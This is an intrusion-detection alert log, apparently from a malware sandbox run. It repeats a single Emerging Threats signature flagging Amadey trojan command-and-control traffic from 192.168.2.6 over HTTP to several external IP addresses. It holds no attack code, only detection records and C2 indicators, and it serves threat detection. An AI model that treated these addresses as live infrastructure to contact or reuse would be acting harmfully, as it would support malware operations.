Timestamp:	2024-08-27T14:22:17.873633+0200
SID:	2856148
Severity:	1
Source Port:	52592
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:22:21.929364+0200
SID:	2856148
Severity:	1
Source Port:	52603
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:21:15.889008+0200
SID:	2856148
Severity:	1
Source Port:	52448
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:22:37.124497+0200
SID:	2856148
Severity:	1
Source Port:	52639
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:21:33.473148+0200
SID:	2856148
Severity:	1
Source Port:	52492
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 89.23.103.42

Timestamp:	2024-08-27T14:18:50.544689+0200
SID:	2856148
Severity:	1
Source Port:	52689
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:20:56.945775+0200
SID:	2856148
Severity:	1
Source Port:	52403
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:21:55.104556+0200
SID:	2856148
Severity:	1
Source Port:	52541
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:19:51.560653+0200
SID:	2856148
Severity:	1
Source Port:	52265
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:22:40.163886+0200
SID:	2856148
Severity:	1
Source Port:	52646
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:21:06.152888+0200
SID:	2856148
Severity:	1
Source Port:	52424
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:20:10.847891+0200
SID:	2856148
Severity:	1
Source Port:	52305
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:19:56.306539+0200
SID:	2856148
Severity:	1
Source Port:	52276
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 89.23.103.42

Timestamp:	2024-08-27T14:20:59.826390+0200
SID:	2856148
Severity:	1
Source Port:	52402
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:22:29.073977+0200
SID:	2856148
Severity:	1
Source Port:	52619
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 89.23.103.42

Timestamp:	2024-08-27T14:21:23.920297+0200
SID:	2856148
Severity:	1
Source Port:	52461
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:20:30.839726+0200
SID:	2856148
Severity:	1
Source Port:	52346
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:22:47.759367+0200
SID:	2856148
Severity:	1
Source Port:	52664
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:21:40.708331+0200
SID:	2856148
Severity:	1
Source Port:	52508
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:21:35.967761+0200
SID:	2856148
Severity:	1
Source Port:	52498
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:19:49.523654+0200
SID:	2856148
Severity:	1
Source Port:	52262
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:21:41.799672+0200
SID:	2856148
Severity:	1
Source Port:	52509
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:20:53.521242+0200
SID:	2856148
Severity:	1
Source Port:	52396
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:22:26.598698+0200
SID:	2856148
Severity:	1
Source Port:	52613
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:22:01.659664+0200
SID:	2856148
Severity:	1
Source Port:	52557
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:21:31.951469+0200
SID:	2856148
Severity:	1
Source Port:	52488
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:20:21.294670+0200
SID:	2856148
Severity:	1
Source Port:	52326
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:20:01.957695+0200
SID:	2856148
Severity:	1
Source Port:	52287
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:21:27.104226+0200
SID:	2856148
Severity:	1
Source Port:	52475
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:20:51.795022+0200
SID:	2856148
Severity:	1
Source Port:	52392
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:22:47.800396+0200
SID:	2856148
Severity:	1
Source Port:	52663
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 89.23.103.42

Timestamp:	2024-08-27T14:20:35.748286+0200
SID:	2856148
Severity:	1
Source Port:	52349
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:20:14.634756+0200
SID:	2856148
Severity:	1
Source Port:	52314
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:21:47.479464+0200
SID:	2856148
Severity:	1
Source Port:	52522
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:20:40.891720+0200
SID:	2856148
Severity:	1
Source Port:	52368
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:19:25.583530+0200
SID:	2856148
Severity:	1
Source Port:	52213
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:20:15.663520+0200
SID:	2856148
Severity:	1
Source Port:	52315
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:19:36.363894+0200
SID:	2856148
Severity:	1
Source Port:	52236
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:21:49.645624+0200
SID:	2856148
Severity:	1
Source Port:	52526
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:22:23.665461+0200
SID:	2856148
Severity:	1
Source Port:	52606
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:21:29.479928+0200
SID:	2856148
Severity:	1
Source Port:	52482
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:19:32.439672+0200
SID:	2856148
Severity:	1
Source Port:	52226
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:20:35.099905+0200
SID:	2856148
Severity:	1
Source Port:	52354
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:22:09.864214+0200
SID:	2856148
Severity:	1
Source Port:	52571
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:20:01.184998+0200
SID:	2856148
Severity:	1
Source Port:	52285
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:19:44.233879+0200
SID:	2856148
Severity:	1
Source Port:	52252
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:20:47.100702+0200
SID:	2856148
Severity:	1
Source Port:	52381
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:22:36.420344+0200
SID:	2856148
Severity:	1
Source Port:	52637
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:20:24.430806+0200
SID:	2856148
Severity:	1
Source Port:	52333
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 89.23.103.42

Timestamp:	2024-08-27T14:19:55.576510+0200
SID:	2856148
Severity:	1
Source Port:	52269
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:21:20.634771+0200
SID:	2856148
Severity:	1
Source Port:	52460
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:20:39.748598+0200
SID:	2856148
Severity:	1
Source Port:	52365
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:20:44.496536+0200
SID:	2856148
Severity:	1
Source Port:	52376
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:20:58.506913+0200
SID:	2856148
Severity:	1
Source Port:	52407
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:22:18.536694+0200
SID:	2856148
Severity:	1
Source Port:	52595
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 89.23.103.42

Timestamp:	2024-08-27T14:22:20.264171+0200
SID:	2856148
Severity:	1
Source Port:	52593
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:22:30.629823+0200
SID:	2856148
Severity:	1
Source Port:	52623
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:22:50.909575+0200
SID:	2856148
Severity:	1
Source Port:	52671
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:21:09.453510+0200
SID:	2856148
Severity:	1
Source Port:	52431
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:21:34.988645+0200
SID:	2856148
Severity:	1
Source Port:	52495
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:19:39.529328+0200
SID:	2856148
Severity:	1
Source Port:	52242
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:19:58.703292+0200
SID:	2856148
Severity:	1
Source Port:	52281
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:19:45.299718+0200
SID:	2856148
Severity:	1
Source Port:	52254
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:22:07.328140+0200
SID:	2856148
Severity:	1
Source Port:	52567
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:22:49.306679+0200
SID:	2856148
Severity:	1
Source Port:	52669
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:22:54.776247+0200
SID:	2856148
Severity:	1
Source Port:	52681
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 89.23.103.42

Timestamp:	2024-08-27T14:22:28.342161+0200
SID:	2856148
Severity:	1
Source Port:	52610
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:19:42.863188+0200
SID:	2856148
Severity:	1
Source Port:	52247
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:22:28.111806+0200
SID:	2856148
Severity:	1
Source Port:	52616
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:21:55.377437+0200
SID:	2856148
Severity:	1
Source Port:	52540
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:20:33.923843+0200
SID:	2856148
Severity:	1
Source Port:	52352
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 89.23.103.42

Timestamp:	2024-08-27T14:20:51.795020+0200
SID:	2856148
Severity:	1
Source Port:	52384
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:21:57.661641+0200
SID:	2856148
Severity:	1
Source Port:	52545
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 89.23.103.42

Timestamp:	2024-08-27T14:19:47.545416+0200
SID:	2856148
Severity:	1
Source Port:	52251
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:21:50.431532+0200
SID:	2856148
Severity:	1
Source Port:	52530
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:20:03.576307+0200
SID:	2856148
Severity:	1
Source Port:	52291
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:19:31.435574+0200
SID:	2856148
Severity:	1
Source Port:	52225
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:20:06.394377+0200
SID:	2856148
Severity:	1
Source Port:	52298
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:21:22.278039+0200
SID:	2856148
Severity:	1
Source Port:	52464
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:22:56.228996+0200
SID:	2856148
Severity:	1
Source Port:	52682
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:21:23.220842+0200
SID:	2856148
Severity:	1
Source Port:	52465
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:21:31.002861+0200
SID:	2856148
Severity:	1
Source Port:	52485
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:21:04.585593+0200
SID:	2856148
Severity:	1
Source Port:	52420
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:22:38.626405+0200
SID:	2856148
Severity:	1
Source Port:	52643
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:19:34.574146+0200
SID:	2856148
Severity:	1
Source Port:	52231
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:20:41.988163+0200
SID:	2856148
Severity:	1
Source Port:	52369
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:22:58.225422+0200
SID:	2856148
Severity:	1
Source Port:	52687
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:19:29.030867+0200
SID:	2856148
Severity:	1
Source Port:	52218
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:20:53.389610+0200
SID:	2856148
Severity:	1
Source Port:	52393
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:20:03.154215+0200
SID:	2856148
Severity:	1
Source Port:	52290
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:20:13.396843+0200
SID:	2856148
Severity:	1
Source Port:	52311
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:22:58.806193+0200
SID:	2856148
Severity:	1
Source Port:	52692
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:19:57.592620+0200
SID:	2856148
Severity:	1
Source Port:	52279
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:22:14.469157+0200
SID:	2856148
Severity:	1
Source Port:	52585
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:20:35.081030+0200
SID:	2856148
Severity:	1
Source Port:	52353
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:20:28.738971+0200
SID:	2856148
Severity:	1
Source Port:	52341
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:21:19.904550+0200
SID:	2856148
Severity:	1
Source Port:	52458
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:22:20.208335+0200
SID:	2856148
Severity:	1
Source Port:	52598
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:20:29.350114+0200
SID:	2856148
Severity:	1
Source Port:	52342
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:19:37.492568+0200
SID:	2856148
Severity:	1
Source Port:	52237
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 89.23.103.42

Timestamp:	2024-08-27T14:21:31.951527+0200
SID:	2856148
Severity:	1
Source Port:	52479
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:22:32.160992+0200
SID:	2856148
Severity:	1
Source Port:	52626
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:22:41.198678+0200
SID:	2856148
Severity:	1
Source Port:	52649
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:20:47.779581+0200
SID:	2856148
Severity:	1
Source Port:	52382
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:20:55.152376+0200
SID:	2856148
Severity:	1
Source Port:	52399
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:22:25.922079+0200
SID:	2856148
Severity:	1
Source Port:	52611
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:22:34.023804+0200
SID:	2856148
Severity:	1
Source Port:	52631
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

